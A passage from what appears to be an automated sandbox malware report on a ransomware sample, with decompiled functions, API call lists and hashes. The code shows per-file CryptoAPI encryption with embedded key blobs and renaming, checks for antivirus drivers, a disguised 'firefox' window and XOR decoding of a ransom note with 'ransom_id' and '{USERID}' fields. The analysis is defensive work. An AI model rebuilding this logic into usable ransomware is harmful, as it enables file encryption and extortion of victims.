                                        • Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                        • Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                        • Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                        • Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                        • Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                        • Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
                                      • RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,E,@,00000000), ref: 00402A84
                                      • lstrlenW.KERNEL32(00000000), ref: 00402A8F
                                      • RegSetValueExW.ADVAPI32(E,@,00520050,00000000,00000001,00000000,00000000), ref: 00402AA4
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                      • String ID: A$E,@$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                      • API String ID: 553367697-1908525871
                                      • Opcode ID: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
                                      • Instruction ID: 6d84f0b14520ef3984e43a4999751383e09c14a2564039d175e156e7e031e40b
                                      • Opcode Fuzzy Hash: e827ed829d67568777a520a8f55151da742d49e97d6881ee8a144ae909d7bb11
                                      • Instruction Fuzzy Hash: A431DBB090021CDFEB20CF91E949BEDBFB5FB01709F108119D5187A292D7BA4948CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 83%
                                      			E004035E0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                      				signed int _v8;
                                      				long _v12;
                                      				long _v16;
                                      				long _v20;
                                      				long _v24;
                                      				void* _v28;
                                      				WCHAR* _v32;
                                      				void* _v36;
                                      				long _v40;
                                      				void* _v44;
                                      				void* _v48;
                                      				WCHAR* _v52;
                                      				void* _v56;
                                      				void* _v60;
                                      				signed int _v64;
                                      				void _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				short _v80;
                                      				long _v84;
                                      				char _v88;
                                      				char _v104;
                                      				char _v108;
                                      				char _v140;
                                      				char _v388;
                                      				void* _t92;
                                      				void* _t93;
                                      				void* _t95;
                                      				void* _t100;
                                      				void* _t106;
                                      				long _t121;
                                      				long _t122;
                                      				void* _t123;
                                      				long _t125;
                                      				WCHAR* _t139;
                                      				void* _t142;
                                      				void* _t145;
                                      				void* _t147;
                                      				WCHAR* _t158;
                                      				WCHAR* _t160;
                                      				void* _t161;
                                      				void* _t162;
                                      				void _t164;
                                      				long _t165;
                                      				void* _t167;
                                      				void* _t169;
                                      				void* _t170;
                                      				void* _t171;
                                      
                                      				_t139 = __ecx;
                                      				_t162 = __edx;
                                      				_v52 = __ecx;
                                      				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_t147 = _t162;
                                      				E00405EA0(_t147, 0, 0,  &_v20,  &_v40);
                                      				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                      				_v80 = 0x47002e;
                                      				_v32 = _t158;
                                      				_v76 = 0x430044;
                                      				_v72 = 0x42;
                                      				lstrcpyW(_t158, _t139);
                                      				lstrcatW(_t158,  &_v80);
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x88], xmm0");
                                      				_push(_t147);
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x78], xmm0");
                                      				_v108 = 0;
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x64], xmm0");
                                      				E00407DB0( &_v104, 0x10);
                                      				E00407DB0( &_v140, 0x20);
                                      				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                      				asm("movdqu xmm0, [ebp-0x88]");
                                      				asm("movdqu [ebx], xmm0");
                                      				asm("movdqu xmm0, [ebp-0x78]");
                                      				_v44 = _t92;
                                      				asm("movdqu [ebx+0x10], xmm0");
                                      				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                      				asm("movdqu xmm0, [ebp-0x64]");
                                      				_t159 = _t93;
                                      				_v48 = _t93;
                                      				asm("movdqu [edi], xmm0");
                                      				_v88 = 0x20;
                                      				_v84 = 0x10;
                                      				_t95 = E00406000(_v20, _v40, _t92,  &_v88, 0x800);
                                      				_t169 = _t167 + 0x18;
                                      				if(_t95 == 0) {
                                      					L22:
                                      					_t160 = _v32;
                                      					asm("xorps xmm0, xmm0");
                                      					asm("movlpd [ebp-0x40], xmm0");
                                      					_t164 = _v68;
                                      					_v8 = _v64;
                                      					L23:
                                      					VirtualFree(_t160, 0, 0x8000);
                                      					return _t164;
                                      				}
                                      				_t100 = E00406000(_v20, _v40, _t159,  &_v84, 0x800);
                                      				_t170 = _t169 + 0x14;
                                      				if(_t100 != 0) {
                                      					E00407EE0( &_v140,  &_v388);
                                      					_t171 = _t170 + 8;
                                      					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                      					_v36 = _t142;
                                      					if(_t142 == 0xffffffff) {
                                      						goto L22;
                                      					}
                                      					_t161 = VirtualAlloc(0, 8, 0x3000, 4);
                                      					 *_t161 = 0;
                                      					 *(_t161 + 4) = 0;
                                      					_t106 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                      					_t165 = 0;
                                      					_v28 = _t106;
                                      					_v24 = 0;
                                      					while(ReadFile(_t142, _t106, 0x100000,  &_v12, 0) != 0) {
                                      						_t121 = _v12;
                                      						if(_t121 == 0) {
                                      							break;
                                      						}
                                      						_t145 = 0;
                                      						_v60 = 0;
                                      						_t165 =  <  ? 1 : _t165;
                                      						 *_t161 =  *_t161 + _t121;
                                      						asm("adc [edi+0x4], ebx");
                                      						_t122 = _v12;
                                      						_v8 = _t122;
                                      						if((_t122 & 0x0000000f) == 0) {
                                      							L12:
                                      							_t123 = VirtualAlloc(0, _t122, 0x3000, 4);
                                      							_t42 =  &_v8; // 0x406438
                                      							_v56 = _t123;
                                      							E004084E0(_t123, _v28,  *_t42);
                                      							_t125 = _v12;
                                      							_t171 = _t171 + 0xc;
                                      							_v64 = _t125;
                                      							if(VirtualAlloc(0, _t125, 0x3000, 4) != 0) {
                                      								E00403500(_v56, _v64,  &_v60,  &_v388,  &_v104, _t126);
                                      								_t145 = _v60;
                                      								_t171 = _t171 + 0x10;
                                      							}
                                      							VirtualFree(_v56, 0, 0x8000);
                                      							SetFilePointer(_v36,  ~_v8, 0, 1);
                                      							if(WriteFile(_v36, _t145, _v12,  &_v16, 0) == 0) {
                                      								_t165 = 1;
                                      								_v24 = 1;
                                      							}
                                      							VirtualFree(_t145, 0, 0x8000);
                                      							_t142 = _v36;
                                      							if(_t165 == 0) {
                                      								_t106 = _v28;
                                      								continue;
                                      							} else {
                                      								break;
                                      							}
                                      						}
                                      						do {
                                      							_t122 = _t122 + 1;
                                      						} while ((_t122 & 0x0000000f) != 0);
                                      						_v12 = _t122;
                                      						goto L12;
                                      					}
                                      					VirtualFree(_v28, 0, 0x8000);
                                      					if(_v24 == 0) {
                                      						WriteFile(_t142, _v44, 0x100,  &_v16, 0);
                                      						WriteFile(_t142, _v48, 0x100,  &_v16, 0);
                                      						WriteFile(_t142, _t161, 0x10,  &_v16, 0);
                                      					}
                                      					CloseHandle(_t142);
                                      					_t164 =  *_t161;
                                      					_v8 =  *(_t161 + 4);
                                      					VirtualFree(_t161, 0, 0x8000);
                                      					VirtualFree(_v44, 0, 0x8000);
                                      					VirtualFree(_v48, 0, 0x8000);
                                      					_t160 = _v32;
                                      					if(_v24 == 0) {
                                      						MoveFileW(_v52, _t160);
                                      					}
                                      					goto L23;
                                      				}
                                      				GetLastError();
                                      				goto L22;
                                      			}



















































                                      0x004035eb
                                      0x004035ed
                                      0x004035f1
                                      0x004035ff
                                      0x00403608
                                      0x00403613
                                      0x0040361f
                                      0x00403621
                                      0x0040363c
                                      0x0040363e
                                      0x00403647
                                      0x0040364a
                                      0x00403651
                                      0x00403658
                                      0x00403663
                                      0x00403669
                                      0x00403676
                                      0x0040367e
                                      0x0040367f
                                      0x0040368a
                                      0x0040368f
                                      0x00403693
                                      0x0040369b
                                      0x004036a0
                                      0x004036b0
                                      0x004036c6
                                      0x004036c8
                                      0x004036de
                                      0x004036e4
                                      0x004036e9
                                      0x004036ec
                                      0x004036f1
                                      0x004036f3
                                      0x004036f8
                                      0x00403703
                                      0x00403706
                                      0x0040370a
                                      0x00403711
                                      0x0040371f
                                      0x0040372a
                                      0x0040372f
                                      0x0040397c
                                      0x0040397c
                                      0x0040397f
                                      0x00403982
                                      0x0040398a
                                      0x0040398d
                                      0x00403990
                                      0x00403998
                                      0x004039a5
                                      0x004039a5
                                      0x00403745
                                      0x0040374a
                                      0x0040374f
                                      0x0040376a
                                      0x0040376f
                                      0x0040378d
                                      0x0040378f
                                      0x00403795
                                      0x00000000
                                      0x00403976
                                      0x004037aa
                                      0x004037b8
                                      0x004037be
                                      0x004037c5
                                      0x004037c7
                                      0x004037c9
                                      0x004037cc
                                      0x004037d4
                                      0x004037ef
                                      0x004037f4
                                      0x00000000
                                      0x00000000
                                      0x004037fa
                                      0x00403806
                                      0x00403809
                                      0x0040380c
                                      0x0040380e
                                      0x00403811
                                      0x00403814
                                      0x00403819
                                      0x00403828
                                      0x00403832
                                      0x00403838
                                      0x0040383b
                                      0x00403842
                                      0x00403847
                                      0x0040384a
                                      0x0040384d
                                      0x00403862
                                      0x0040387a
                                      0x0040387f
                                      0x00403882
                                      0x00403882
                                      0x0040388f
                                      0x004038a2
                                      0x004038bd
                                      0x004038bf
                                      0x004038c4
                                      0x004038c4
                                      0x004038cf
                                      0x004038d5
                                      0x004038da
                                      0x004037d1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004038da
                                      0x00403820
                                      0x00403820
                                      0x00403821
                                      0x00403825
                                      0x00000000
                                      0x00403825
                                      0x004038ea
                                      0x004038f4
                                      0x0040390b
                                      0x0040391c
                                      0x00403928
                                      0x00403928
                                      0x0040392b
                                      0x00403934
                                      0x00403944
                                      0x00403947
                                      0x00403953
                                      0x0040395f
                                      0x00403965
                                      0x00403968
                                      0x0040396e
                                      0x0040396e
                                      0x00000000
                                      0x00403968
                                      0x00403751
                                      0x00000000

                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 004035F4
                                      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004035FF
                                      • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0040363A
                                      • lstrcpyW.KERNEL32 ref: 00403658
                                      • lstrcatW.KERNEL32(00000000,0047002E), ref: 00403663
                                        • Part of subcall function 00407DB0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
                                        • Part of subcall function 00407DB0: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
                                        • Part of subcall function 00407DB0: GetModuleHandleA.KERNEL32(?), ref: 00407E4D
                                        • Part of subcall function 00407DB0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
                                        • Part of subcall function 00407DB0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
                                        • Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
                                        • Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C
                                        • Part of subcall function 00407DB0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
                                        • Part of subcall function 00407DB0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036C6
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 004036F1
                                        • Part of subcall function 00406000: EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
                                        • Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
                                        • Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
                                        • Part of subcall function 00406000: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403998
                                        • Part of subcall function 00406000: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
                                        • Part of subcall function 00406000: CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
                                        • Part of subcall function 00406000: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
                                        • Part of subcall function 00406000: GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
                                        • Part of subcall function 00406000: CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
                                        • Part of subcall function 00406000: LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103
                                      • GetLastError.KERNEL32 ref: 00403751
                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00403787
                                      • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000004), ref: 004037A6
                                      • VirtualAlloc.KERNEL32(00000000,00100001,00003000,00000004), ref: 004037C5
                                      • ReadFile.KERNEL32(00000000,00000000,00100000,?,00000000), ref: 004037E1
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00403832
                                      • _memmove.LIBCMT ref: 00403842
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0040385A
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040388F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Crypt$Alloc$Context$FileFree$AcquireErrorLastRelease$AttributesCriticalSection$AddressCreateEncryptEnterHandleImportLeaveLibraryLoadModuleParamProcRead_memmovelstrcatlstrcpy
                                      • String ID: $.$8d@$B$D
                                      • API String ID: 837238375-279925716
                                      • Opcode ID: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
                                      • Instruction ID: e6440529c24e0b0f2c5be8c2954fde7d882e22268c9ef2e78ee628bee86a44a3
                                      • Opcode Fuzzy Hash: cc765af47e0748f127cec44c57b369b1d6a7a1ea1d6bebdc5749c6e163b29892
                                      • Instruction Fuzzy Hash: 28B15DB1E40309BBEB119F94CD45FEEBBB8AB48700F204125F644BA2D1DBB45E448B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 84%
                                      			E00402D30() {
                                      				struct _WNDCLASSEXW _v52;
                                      				struct tagMSG _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				char _v96;
                                      				short _t42;
                                      				void* _t49;
                                      				void* _t61;
                                      				void* _t62;
                                      				void* _t67;
                                      				void* _t69;
                                      				long _t71;
                                      
                                      				_push(_t62);
                                      				_push(_t69);
                                      				_v84.message = 0x6c006b;
                                      				_push(_t67);
                                      				_v84.wParam = 0x660069;
                                      				_v84.lParam = 0x73002e;
                                      				_v84.time = 0x730079;
                                      				_v84.pt = 0;
                                      				_v96 = 0x6c006b;
                                      				_v92 = 0x2e0031;
                                      				_v88 = 0x790073;
                                      				_v84.hwnd = 0x73;
                                      				if(E00402F50( &(_v84.message)) != 0 || E00402F50( &_v96) != 0) {
                                      					L5:
                                      					_v52.cbSize = 0x30;
                                      					_v52.style = 3;
                                      					_v52.lpfnWndProc = E00402C50;
                                      					_v52.cbClsExtra = 0;
                                      					_v52.cbWndExtra = 0;
                                      					_v52.hInstance = GetModuleHandleW(0);
                                      					_v52.hIcon = 0;
                                      					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                      					_v52.hbrBackground = 6;
                                      					_v52.lpszMenuName = 0;
                                      					_v52.lpszClassName = L"win32app";
                                      					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                      					_t42 = RegisterClassExW( &_v52);
                                      					_push(0);
                                      					if(_t42 != 0) {
                                      						GetModuleHandleW();
                                      						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                      						SetWindowLongW(_t71, 0xfffffff0, 0);
                                      						if(_t71 != 0) {
                                      							ShowWindow(_t71, 5);
                                      							UpdateWindow(_t71);
                                      							_t49 = CreateThread(0, 0, E00402D10, _t71, 0, 0);
                                      							if(_t49 != 0) {
                                      								CloseHandle(_t49);
                                      							}
                                      							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
                                      								do {
                                      									TranslateMessage( &_v84);
                                      								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                      							}
                                      							goto L15;
                                      						}
                                      						ExitThread(_t71);
                                      					}
                                      					ExitThread();
                                      				} else {
                                      					_v84.message = 0x730066;
                                      					_v84.wParam = 0x660064;
                                      					_v84.lParam = 0x2e0077;
                                      					_v84.time = 0x790073;
                                      					_v84.pt = 0x73;
                                      					if(E00402F50( &(_v84.message)) != 0) {
                                      						L15:
                                      						ExitThread(0);
                                      					}
                                      					_t61 = E004030A0(_t62, _t67, _t69);
                                      					if(_t61 != 0) {
                                      						goto L15;
                                      					}
                                      					_push(_t61);
                                      					E00402AD0();
                                      					goto L5;
                                      				}
                                      			}















                                      0x00402d39
                                      0x00402d3a
                                      0x00402d3d
                                      0x00402d45
                                      0x00402d4a
                                      0x00402d52
                                      0x00402d5a
                                      0x00402d62
                                      0x00402d67
                                      0x00402d6f
                                      0x00402d77
                                      0x00402d7f
                                      0x00402d8e
                                      0x00402de9
                                      0x00402df1
                                      0x00402df9
                                      0x00402e01
                                      0x00402e09
                                      0x00402e11
                                      0x00402e22
                                      0x00402e26
                                      0x00402e3d
                                      0x00402e41
                                      0x00402e49
                                      0x00402e51
                                      0x00402e5f
                                      0x00402e68
                                      0x00402e6e
                                      0x00402e73
                                      0x00402e7b
                                      0x00402eaf
                                      0x00402eb4
                                      0x00402ebc
                                      0x00402ec8
                                      0x00402ecf
                                      0x00402ee3
                                      0x00402eeb
                                      0x00402eee
                                      0x00402eee
                                      0x00402f09
                                      0x00402f17
                                      0x00402f1c
                                      0x00402f25
                                      0x00402f17
                                      0x00000000
                                      0x00402f09
                                      0x00402ebf
                                      0x00402ebf
                                      0x00402e75
                                      0x00402d9d
                                      0x00402da1
                                      0x00402da9
                                      0x00402db1
                                      0x00402db9
                                      0x00402dc1
                                      0x00402dd0
                                      0x00402f3d
                                      0x00402f3f
                                      0x00402f3f
                                      0x00402dd6
                                      0x00402ddd
                                      0x00000000
                                      0x00000000
                                      0x00402de3
                                      0x00402de4
                                      0x00000000
                                      0x00402de4

                                      APIs
                                        • Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74
                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402E19
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00402E2E
                                      • LoadIconW.USER32 ref: 00402E59
                                      • RegisterClassExW.USER32 ref: 00402E68
                                      • ExitThread.KERNEL32 ref: 00402E75
                                        • Part of subcall function 00402F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402E7B
                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00402E81
                                      • CreateWindowExW.USER32 ref: 00402EA7
                                      • SetWindowLongW.USER32 ref: 00402EB4
                                      • ExitThread.KERNEL32 ref: 00402EBF
                                        • Part of subcall function 00402F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 00402FA8
                                        • Part of subcall function 00402F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 00402FCF
                                        • Part of subcall function 00402F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00402FE3
                                        • Part of subcall function 00402F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402FFA
                                      • ExitThread.KERNEL32 ref: 00402F3F
                                        • Part of subcall function 00402AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
                                        • Part of subcall function 00402AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
                                        • Part of subcall function 00402AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
                                        • Part of subcall function 00402AD0: ExitThread.KERNEL32 ref: 00402C47
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00402EC8
                                      • UpdateWindow.USER32(00000000), ref: 00402ECF
                                      • CreateThread.KERNEL32 ref: 00402EE3
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402EEE
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F05
                                      • TranslateMessage.USER32(?), ref: 00402F1C
                                      • DispatchMessageW.USER32 ref: 00402F23
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F37
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                      • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                      • API String ID: 3011903443-520298170
                                      • Opcode ID: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
                                      • Instruction ID: 6dadb659047271fd80ce1d130f626f3db599e38ffd86fa9de69c1f1ec4dcf306
                                      • Opcode Fuzzy Hash: 605d35a8cd460521619b827d31ec0ae0cacd7f64ed54dbd115d713509215f6a8
                                      • Instruction Fuzzy Hash: 0F515070248302AFF7109F618D0DB5B7AE4AF44748F10092DF684BA2D1D7F99945CB9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 394 4040a0-4040b5 395 4040bb-404117 call 4039b0 call 406d90 call 406ba0 VirtualAlloc 394->395 396 40431c-404321 394->396 403 404128 395->403 404 404119-404122 395->404 406 40412a-40416b call 4069a0 call 407ba0 lstrlenW 403->406 404->403 405 404124-404126 404->405 405->406 411 404170-404182 406->411 411->411 412 404184 411->412 413 404190-40419d 412->413 413->413 414 40419f-4041bc call 407ba0 413->414 417 40423a-4042cf 414->417 418 4041be 414->418 420 4042d1-4042eb VirtualAlloc 417->420 421 404302-404317 VirtualFree call 407720 417->421 419 4041c0-4041e6 lstrcpyW lstrlenW 418->419 419->417 422 4041e8-4041ed 419->422 420->421 423 4042ed-4042ff wsprintfW 420->423 421->396 425 4041f3-4041fb 422->425 423->421 426 404227-404234 425->426 427 4041fd 425->427 426->425 429 404236 426->429 428 404200-404206 427->428 430 404322-404326 428->430 431 40420c-404212 428->431 429->417 430->419 432 404214-40421b 431->432 433 40421d-404221 431->433 432->428 432->433 433->426 433->430
                                      C-Code - Quality: 47%
                                      			E004040A0(void* __ecx) {
                                      				char _v148;
                                      				char _v152;
                                      				void* _v156;
                                      				short _v164;
                                      				intOrPtr _v168;
                                      				intOrPtr _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				intOrPtr _v224;
                                      				intOrPtr _v228;
                                      				char _v232;
                                      				WCHAR* _v236;
                                      				WCHAR* _v240;
                                      				void* _t44;
                                      				void* _t48;
                                      				void* _t50;
                                      				signed int _t51;
                                      				void* _t52;
                                      				WCHAR* _t56;
                                      				signed short _t60;
                                      				signed short* _t61;
                                      				WCHAR* _t68;
                                      				signed int _t73;
                                      				signed int _t74;
                                      				void* _t77;
                                      				void* _t80;
                                      				long _t83;
                                      				WCHAR* _t84;
                                      				signed int _t87;
                                      				void* _t88;
                                      				WCHAR* _t90;
                                      				void* _t92;
                                      				WCHAR* _t113;
                                      
                                      				if( *0x412b04 != 0) {
                                      					L25:
                                      					return _t44;
                                      				}
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				E004039B0( &_v148);
                                      				E00406D90( &_v236);
                                      				_t87 = E00406BA0( &_v236);
                                      				_t83 = 0x42 + _t87 * 2;
                                      				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
                                      				_v240 = _t48;
                                      				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
                                      					_t88 = 0;
                                      				} else {
                                      					_t88 = _t48;
                                      				}
                                      				E004069A0( &_v152, _t88);
                                      				_t50 = E00407BA0(_t88, L"ransom_id=");
                                      				_t51 = lstrlenW(L"ransom_id=");
                                      				asm("movdqa xmm1, [0x410940]");
                                      				_t68 = 0x412000;
                                      				_t77 = 0xad;
                                      				_t90 = _t50 + _t51 * 2;
                                      				_t52 = 0xad0;
                                      				_v240 = _t90;
                                      				do {
                                      					_t13 =  &(_t68[8]); // 0x44004e
                                      					_t68 = _t13;
                                      					asm("movdqu xmm0, [ecx-0x10]");
                                      					asm("pxor xmm0, xmm1");
                                      					asm("movdqu [ecx-0x10], xmm0");
                                      					_t77 = _t77 - 1;
                                      				} while (_t77 != 0);
                                      				do {
                                      					 *(_t52 + 0x412000) =  *(_t52 + 0x412000) ^ 0x00000005;
                                      					_t52 = _t52 + 1;
                                      				} while (_t52 < 0xad6);
                                      				 *0x412b04 = 0x412000;
                                      				_t84 = E00407BA0(0x412000, L"{USERID}");
                                      				if(_t84 == 0) {
                                      					L21:
                                      					_v232 = 0x740068;
                                      					_v228 = 0x700074;
                                      					_v224 = 0x2f003a;
                                      					_v220 = 0x67002f;
